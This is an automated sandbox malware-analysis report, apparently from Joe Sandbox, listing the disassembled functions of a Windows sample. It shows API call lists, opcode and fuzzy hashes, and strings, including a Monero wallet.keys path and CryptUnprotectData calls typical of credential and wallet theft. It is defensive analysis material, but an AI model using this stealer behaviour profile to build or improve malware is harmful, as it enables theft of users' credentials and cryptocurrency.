                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: f665afd0e21e2cb5caef8575005c059a6fe7cb7f6ee9fc486a86065749cbb8a2
                                • Instruction ID: bccc114735bc7f1e161989dec7c595c6814c4e661c1fe5ba3e8458cb1d56331b
                                • Opcode Fuzzy Hash: f665afd0e21e2cb5caef8575005c059a6fe7cb7f6ee9fc486a86065749cbb8a2
                                • Instruction Fuzzy Hash: 40412E71940228ABDB24DF54EC99BEEB7B4FF48700F204199E50A76281DB742F85CFA1
                                Function 00E1E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E30D73), ref: 00E1E4A2
                                • StrCmpCA.SHLWAPI(?,00E314F8), ref: 00E1E4F2
                                • StrCmpCA.SHLWAPI(?,00E314FC), ref: 00E1E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: e73e25329df65229efbd1f45b8b2203ad53131c6f514940ad4036dadae5bfe9b
                                • Instruction ID: b0e82eed31aee7e7680a4abe964f98d3b56dd14bc47710aeb22c3be096e78353
                                • Opcode Fuzzy Hash: e73e25329df65229efbd1f45b8b2203ad53131c6f514940ad4036dadae5bfe9b
                                • Instruction Fuzzy Hash: A71244729101249BDB1CFB60EC9AEED73B9AF94300F4455B9F50A72081EE745F89CB92
                                Function 011E4039 Relevance: 9.1, Strings: 6, Instructions: 1624COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "j?$*_:$l_%[$pW}$Jf:$]O?
                                • API String ID: 0-1442580323
                                • Opcode ID: 3a2ca93748d25c859b37276daeaf831aece83628a36dcc6ea9594e1eee836a74
                                • Instruction ID: 5df29a32fb7621c60cc5a781d940911e2046aa697ff19ed4db771a523c5a6023
                                • Opcode Fuzzy Hash: 3a2ca93748d25c859b37276daeaf831aece83628a36dcc6ea9594e1eee836a74
                                • Instruction Fuzzy Hash: 43B248F360C2049FE3086E2DEC8567AFBE9EF94320F1A453DEAC5C3744EA3558058696
                                Function 011D35B9 Relevance: 9.1, Strings: 6, Instructions: 1596COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: O_Z$Ryug$Ryug$cIwy$jHj~$xu
                                • API String ID: 0-1463951730
                                • Opcode ID: b15bce1063b4359fdee5453c75fb5fa91816f6ce0c197a0d8298c3c9a342aa75
                                • Instruction ID: 7e52ab14d943e988b636a9bf31ec7f71387dbaf2f0b51c3f124ba36072ecbd63
                                • Opcode Fuzzy Hash: b15bce1063b4359fdee5453c75fb5fa91816f6ce0c197a0d8298c3c9a342aa75
                                • Instruction Fuzzy Hash: 31B207F3A0C2049FE304AE2DEC8567ABBE5EF94720F16853DE6C4C7744EA3598058796
                                Function 00E19AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00E14EEE,00000000,?), ref: 00E19B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19B2A
                                • LocalFree.KERNEL32(?,?,?,?,00E14EEE,00000000,?), ref: 00E19B3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID: N
                                • API String ID: 4291131564-1689755984
                                • Opcode ID: b5b86d994aa39b69406a612238308a80e1d2a5e87477b0728e4c2359ddaad57d
                                • Instruction ID: dd92deb803cbe342aaab0d2b65ebaca6d83ac45dab9d149d792b2a7aa048e14f
                                • Opcode Fuzzy Hash: b5b86d994aa39b69406a612238308a80e1d2a5e87477b0728e4c2359ddaad57d
                                • Instruction Fuzzy Hash: C811A2B4240308EFEB10CF64D895FAA77B5FB89B04F208559FA159B384C7B6A941CB94
                                Function 011E245E Relevance: 7.9, Strings: 5, Instructions: 1656COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /|w$Gkoj$v8g$v8g$pzz
                                • API String ID: 0-1436474391
                                • Opcode ID: abe2b22a790955a32b6ac8659db3d7c304e58102f37302be69b9b265fa69722e
                                • Instruction ID: 7b27cc8ec14b4b237fe80a3fc9b0b553d64a3de977fd8ff466499757438212b3
                                • Opcode Fuzzy Hash: abe2b22a790955a32b6ac8659db3d7c304e58102f37302be69b9b265fa69722e
                                • Instruction Fuzzy Hash: 6FB20BF3A0C2109FE304AE29EC8567AB7E9EFD4720F1A853DE6C5C7744E63598018796
                                Function 011D9F77 Relevance: 7.8, Strings: 5, Instructions: 1599COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *{oo$7P:?$YQwv$B>^$B>^
                                • API String ID: 0-941376645
                                • Opcode ID: 509d138357f551ef23c9f202818c722f39b0b385ed9306a08b923bb5c4514407
                                • Instruction ID: 3aca75b2f71f2321791caba94fb9f1d0936932b5585ed79aa705eb0a038e9c7c
                                • Opcode Fuzzy Hash: 509d138357f551ef23c9f202818c722f39b0b385ed9306a08b923bb5c4514407
                                • Instruction Fuzzy Hash: 6EB2F9F3608214AFE304AE2DEC8567AFBE9EF94720F16493DEAC5C3744E63558018697
                                Function 011DD404 Relevance: 7.8, Strings: 5, Instructions: 1580COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: +`?>$:mg$\}W_$e1~W$l^C:
                                • API String ID: 0-1207566776
                                • Opcode ID: dd3f6aa3b4523c18cacdaeea847aa6cc45b3c233637272cd03a7ae89aa3bff1b
                                • Instruction ID: b8ad2653ae1d3b93fa3deb1eaefb7fc45217ae9aad8e8abe245ff2712dba6117
                                • Opcode Fuzzy Hash: dd3f6aa3b4523c18cacdaeea847aa6cc45b3c233637272cd03a7ae89aa3bff1b
                                • Instruction Fuzzy Hash: 66B2F6F3A0C2009FE304AE2DEC8577ABBE9EF94320F16493DE6C5C7744E63598458696
                                Function 011D6A30 Relevance: 7.8, Strings: 5, Instructions: 1548COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "H}m$ebc$ebc$~o>p$7'
                                • API String ID: 0-1202201637
                                • Opcode ID: 80ba30a4ea9a271afb11e26ba4bd3e88770e15433481262ce1f068b03cced8b6
                                • Instruction ID: 51e19a52173a33fc4229f3d8ed338b263d8806f5e527ae7309ebad9c2b612722
                                • Opcode Fuzzy Hash: 80ba30a4ea9a271afb11e26ba4bd3e88770e15433481262ce1f068b03cced8b6
                                • Instruction Fuzzy Hash: DBA215F350C2009FE304AE29EC8567AFBE9EF94720F16893DEAC5C7744EA3558058697
                                Function 00E1C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E1C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E1C87C
                                • lstrcat.KERNEL32(?,00E30B46), ref: 00E1C943
                                • lstrcat.KERNEL32(?,00E30B47), ref: 00E1C957
                                • lstrcat.KERNEL32(?,00E30B4E), ref: 00E1C978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: cf1907f4be6eae0bff3a15f5a12068198b86c257a43d4a7e46305e83052fc1c9
                                • Instruction ID: daac1467b140991a9cb0d0cd7e7f4ba1d961e79bed49083a3c34314a69a33d7a
                                • Opcode Fuzzy Hash: cf1907f4be6eae0bff3a15f5a12068198b86c257a43d4a7e46305e83052fc1c9
                                • Instruction Fuzzy Hash: 78416DB4A0431ADBDB10DF90DD89BFFB7B8AB88304F1042A8E509B7280D7755A84CF91
                                Function 011E79ED Relevance: 7.6, Strings: 5, Instructions: 1318COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !Wo_$!Wo_$Auy{$Ci?$eJk
                                • API String ID: 0-3732368636
                                • Opcode ID: adb80f3a428c6016a2731070dc922afc74ff1966394e8f0d1f94a285381ad60b
                                • Instruction ID: 10dce0058d218d0e3fcca9b90a792f7629637de2fa2880180f4f1cb5414b33fc
                                • Opcode Fuzzy Hash: adb80f3a428c6016a2731070dc922afc74ff1966394e8f0d1f94a285381ad60b
                                • Instruction Fuzzy Hash: A49228F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A453DEAC4C3744E63558158697
                                Function 00E17240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E1724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E17254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E17281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E172A4
                                • LocalFree.KERNEL32(?), ref: 00E172AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
